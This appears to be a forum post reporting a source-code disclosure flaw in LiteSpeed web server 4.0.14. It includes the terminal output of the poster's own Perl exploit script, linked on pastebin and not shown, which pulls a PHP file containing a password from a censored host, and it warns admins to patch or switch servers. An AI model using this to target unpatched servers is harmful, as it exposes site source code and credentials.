4.0.14 is vulnerable
under my tests.
bin/lshttpd.4.0.14: ELF 64-bit LSB executable, AMD x86-64, version 1 (GNU/Linux), statically linked, stripped
However, the exploit linked here did *NOT* work. I had to write my own version to get reproducible effects.
Here is the source: pastebin.ca/1882204 (can't directly link, I don't have 5 posts
-05:04:20- seraphic:~/test luna% ./litespeed.pl <censored> /test.php
[.] webserver accepted the request
[.] <censored>:80 is running LiteSpeed
[+] file (test.php.txt) has been saved.
-05:07:03- seraphic:~/test luna% cat <censored>\:80-test.php
$super_secure_password = "vulnerable";
Yes, I am aware the reported file it saves to is wrong, I wrote it at 4 in the morning. Cut me a little slack.
Let everybody you know running LiteSpeed (especially in place of Apache on cPanel servers, like I'm doing) to either hotfix with mod_security (does this work?) or switch back to Apache until an upgrade is released.